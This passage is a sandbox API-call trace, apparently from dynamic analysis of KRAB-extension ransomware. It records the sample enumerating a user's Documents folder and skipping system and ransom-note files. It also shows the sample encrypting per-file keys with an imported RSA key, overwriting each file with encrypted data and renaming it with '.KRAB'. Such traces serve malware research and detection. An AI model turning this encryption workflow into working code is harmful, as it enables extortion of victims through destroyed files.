returned 1 [0088.629] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.633] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.634] CloseHandle (hObject=0x434) returned 1 [0088.634] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.634] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\aqw_s38if0k5m.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\aqw_s38if0k5m.pptx.krab")) returned 1 [0088.635] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.635] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.635] lstrcmpW (lpString1="Cor4llShd wqCH.pptx", lpString2=".") returned 1 [0088.635] lstrcmpW (lpString1="Cor4llShd wqCH.pptx", lpString2="..") returned 1 [0088.636] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Cor4llShd wqCH.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx" [0088.636] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.636] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx.KRAB") returned 56 [0088.636] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx") returned 51 [0088.636] lstrlenW (lpString=".pptx") returned 5 [0088.636] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.636] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0088.636] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.637] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx") returned 51 [0088.637] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx") returned 51 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="desktop.ini") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="autorun.inf") returned 1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="ntuser.dat") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="iconcache.db") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="bootsect.bak") returned 1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="boot.ini") returned 1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="ntuser.dat.log") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="thumbs.db") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="ntldr") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="NTDETECT.COM") returned -1 [0088.637] lstrcmpiW (lpString1="Cor4llShd wqCH.pptx", lpString2="Bootfont.bin") returned 1 [0088.637] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.638] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010c60) returned 1 [0088.639] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.640] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.640] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.641] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.641] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0088.641] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.641] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0088.642] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.643] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.643] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.643] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.643] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0088.643] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.644] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10108a8) returned 1 [0088.645] CryptImportKey (in: hProv=0x10108a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0088.645] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.645] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.646] GetLastError () returned 0x0 [0088.646] CryptDestroyKey (hKey=0x1023338) returned 1 [0088.646] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0088.646] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0088.647] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0088.647] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.647] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.648] GetLastError () returned 0x0 [0088.648] CryptDestroyKey (hKey=0x10234f8) returned 1 [0088.648] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0088.648] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\cor4llshd wqch.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.648] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.649] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.649] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xbd1b, lpOverlapped=0x0) returned 1 [0088.662] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff42e5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.662] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xbd1b, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xbd1b, lpOverlapped=0x0) returned 1 [0088.663] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.663] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.667] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.667] CloseHandle (hObject=0x434) returned 1 [0088.667] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.668] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\cor4llshd wqch.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Cor4llShd wqCH.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\cor4llshd wqch.pptx.krab")) returned 1 [0088.668] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.669] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.669] lstrcmpW (lpString1="cta6w03zh.ots", lpString2=".") returned 1 [0088.669] lstrcmpW (lpString1="cta6w03zh.ots", lpString2="..") returned 1 [0088.669] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="cta6w03zh.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots" [0088.669] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.669] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots.KRAB") returned 50 [0088.669] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots") returned 45 [0088.669] lstrlenW (lpString=".ots") returned 4 [0088.669] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.670] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ots ") returned 5 [0088.670] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.670] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots") returned 45 [0088.670] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots") returned 45 [0088.670] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="desktop.ini") returned -1 [0088.670] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="autorun.inf") returned 1 [0088.670] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="ntuser.dat") returned -1 [0088.670] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="iconcache.db") returned -1 [0088.670] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="bootsect.bak") returned 1 [0088.670] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="boot.ini") returned 1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="ntuser.dat.log") returned -1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="thumbs.db") returned -1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="KRAB-DECRYPT.html") returned -1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="ntldr") returned -1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="NTDETECT.COM") returned -1 [0088.671] lstrcmpiW (lpString1="cta6w03zh.ots", lpString2="Bootfont.bin") returned 1 [0088.674] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.675] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010e80) returned 1 [0088.676] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.677] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.677] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.677] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.677] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0088.677] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.678] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011238) returned 1 [0088.679] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.680] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.680] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.680] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.680] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0088.680] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.681] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10108a8) returned 1 [0088.682] CryptImportKey (in: hProv=0x10108a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0088.682] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.682] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.683] GetLastError () returned 0x0 [0088.683] CryptDestroyKey (hKey=0x10231f8) returned 1 [0088.683] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0088.683] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10114e0) returned 1 [0088.684] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0088.684] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.684] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.685] GetLastError () returned 0x0 [0088.685] CryptDestroyKey (hKey=0x1023338) returned 1 [0088.685] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0088.685] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\cta6w03zh.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.685] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.686] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.686] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xe1a8, lpOverlapped=0x0) returned 1 [0088.700] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff1e58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.700] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xe1a8, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xe1a8, lpOverlapped=0x0) returned 1 [0088.700] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.700] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.705] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.705] CloseHandle (hObject=0x434) returned 1 [0088.705] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.706] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\cta6w03zh.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\cta6w03zh.ots.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\cta6w03zh.ots.krab")) returned 1 [0088.707] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.707] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.707] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0088.707] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0088.707] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a08d2ca4dee3d.lock" [0088.707] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.708] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 60 [0088.708] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a08d2ca4dee3d.lock") returned 55 [0088.708] lstrlenW (lpString=".lock") returned 5 [0088.708] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.708] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0088.708] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.709] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.709] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.709] lstrcmpW (lpString1="Database1.accdb", lpString2=".") returned 1 [0088.709] lstrcmpW (lpString1="Database1.accdb", lpString2="..") returned 1 [0088.709] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Database1.accdb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb" [0088.709] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.709] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb.KRAB") returned 52 [0088.709] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0088.709] lstrlenW (lpString=".accdb") returned 6 [0088.710] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.710] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".accdb ") returned 7 [0088.710] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0088.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0088.710] lstrcmpiW (lpString1="Database1.accdb", lpString2="desktop.ini") returned -1 [0088.710] lstrcmpiW (lpString1="Database1.accdb", lpString2="autorun.inf") returned 1 [0088.710] lstrcmpiW (lpString1="Database1.accdb", lpString2="ntuser.dat") returned -1 [0088.710] lstrcmpiW (lpString1="Database1.accdb", lpString2="iconcache.db") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="bootsect.bak") returned 1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="boot.ini") returned 1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="ntuser.dat.log") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="thumbs.db") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="KRAB-DECRYPT.html") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="ntldr") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="NTDETECT.COM") returned -1 [0088.711] lstrcmpiW (lpString1="Database1.accdb", lpString2="Bootfont.bin") returned 1 [0088.711] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.711] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0088.713] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.714] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.714] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.714] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.714] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0088.714] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.714] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0088.716] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.717] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.717] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.717] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.717] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0088.717] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.717] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0088.728] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023138) returned 1 [0088.728] CryptGetKeyParam (in: hKey=0x1023138, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.728] CryptEncrypt (in: hKey=0x1023138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.728] GetLastError () returned 0x0 [0088.728] CryptDestroyKey (hKey=0x1023138) returned 1 [0088.728] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.729] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010a40) returned 1 [0088.730] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023038) returned 1 [0088.730] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.730] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.731] GetLastError () returned 0x0 [0088.731] CryptDestroyKey (hKey=0x1023038) returned 1 [0088.731] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0088.731] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.731] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.732] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, 